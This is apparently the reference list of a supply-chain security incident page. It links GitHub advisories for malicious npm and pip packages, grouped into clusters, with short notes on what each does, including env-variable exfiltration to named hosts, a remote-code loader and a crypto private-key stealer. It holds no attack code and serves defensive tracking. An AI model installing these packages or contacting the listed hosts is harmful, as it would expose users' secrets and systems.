- [GHSA-5567-73jx-f7g3 - strapi-plugin-listcc-meeb (Cluster A)](https://github.com/advisories/GHSA-5567-73jx-f7g3) - GitHub
- [GHSA-p65g-47hv-5mfm - strapi-plugin-maylog-meeb (Cluster A)](https://github.com/advisories/GHSA-p65g-47hv-5mfm) - GitHub
- [GHSA-p247-8vcf-jcm5 - strapi-plugin-portcc-meeb (Cluster A)](https://github.com/advisories/GHSA-p247-8vcf-jcm5) - GitHub
- [GHSA-x89g-768f-7xrv - strapi-plugin-persh-meeb (Cluster A)](https://github.com/advisories/GHSA-x89g-768f-7xrv) - GitHub
- [GHSA-4373-h9cc-p2hr - strapi-plugin-honey-meeb (Cluster A)](https://github.com/advisories/GHSA-4373-h9cc-p2hr) - GitHub
- [GHSA-8q85-7c4r-6v2c - strapi-plugin-ccip-meeb (Cluster A)](https://github.com/advisories/GHSA-8q85-7c4r-6v2c) - GitHub
- [GHSA-75rj-xxh3-3j2q - strapi-plugin-cccon-meeb (Cluster A)](https://github.com/advisories/GHSA-75rj-xxh3-3j2q) - GitHub
- [GHSA-6jhp-v2xp-285p - strapi-plugin-osag (Cluster B - Burp Collaborator OOB recon)](https://github.com/advisories/GHSA-6jhp-v2xp-285p) - GitHub
- [GHSA-q676-3wp5-xm49 - strapi-plugin-os-rec (Cluster B)](https://github.com/advisories/GHSA-q676-3wp5-xm49) - GitHub
- [GHSA-8w76-frwh-rcpm - @traktis/environment (Cluster C - dep-confusion, tko.amgsec.com env exfil)](https://github.com/advisories/GHSA-8w76-frwh-rcpm) - GitHub
- [GHSA-968f-vpg2-j5xr - @traktis/core (Cluster C)](https://github.com/advisories/GHSA-968f-vpg2-j5xr) - GitHub
- [GHSA-vgjx-m4jg-wrvq - process-mite (Cluster D - api.npoint.io remote-code loader, sibling of process-lhpm)](https://github.com/advisories/GHSA-vgjx-m4jg-wrvq) - GitHub
- [GHSA-g9xj-rjfw-h7h6 - jexkcode (Cluster E - Baileys WhatsApp newsletter-follower)](https://github.com/advisories/GHSA-g9xj-rjfw-h7h6) - GitHub
- [GHSA-4vpr-3r9p-p9fh - kartyk-github-single-ver-pkg (Cluster F - CWE-506 pentest)](https://github.com/advisories/GHSA-4vpr-3r9p-p9fh) - GitHub
- [GHSA-4rmp-vchm-9gvg - kartyk-github-token-pkg (Cluster F)](https://github.com/advisories/GHSA-4rmp-vchm-9gvg) - GitHub
- [GHSA-4vxh-7998-9h4g - kartyk-github-oidc-test-pkg (Cluster F)](https://github.com/advisories/GHSA-4vxh-7998-9h4g) - GitHub
- [GHSA-8gcf-3vx7-2wrq - praetorian-mind-rce-test-2026 (Cluster G - pip env exfil)](https://github.com/advisories/GHSA-8gcf-3vx7-2wrq) - GitHub
- [GHSA-2mp7-443g-cw4c - rak-lab-yoav-orca-zrktd2cp5hjmo4x7 (Cluster G - pip dep-confusion probe)](https://github.com/advisories/GHSA-2mp7-443g-cw4c) - GitHub
- [GHSA-xr9j-54f9-pcpm - trongappy (Cluster G - Tron private-key stealer)](https://github.com/advisories/GHSA-xr9j-54f9-pcpm) - GitHub
- [GHSA-63f3-rmrf-6m9q - pkg-rollback-dreed-viced-sonic-ponds (Cluster H - CWE-506 boilerplate)](https://github.com/advisories/GHSA-63f3-rmrf-6m9q) - GitHub
- [GHSA-xq97-9c5h-5m43 - bender-rspack-config (Cluster H - OpenSSF Package Analysis)](https://github.com/advisories/GHSA-xq97-9c5h-5m43) - GitHub
- [OpenSSF malicious-packages repository](https://github.com/ossf/malicious-packages) - OpenSSF

---

Canonical page: https://dependencywatch.io/incident/multi-2026-09-17-ghsa-malware-sweep
Markdown version: https://dependencywatch.io/incident/multi-2026-09-17-ghsa-malware-sweep.md
Site index for agents: https://dependencywatch.io/llms.txt
DependencyWatch.io is operated by Precursor Security (https://precursorsecurity.com).
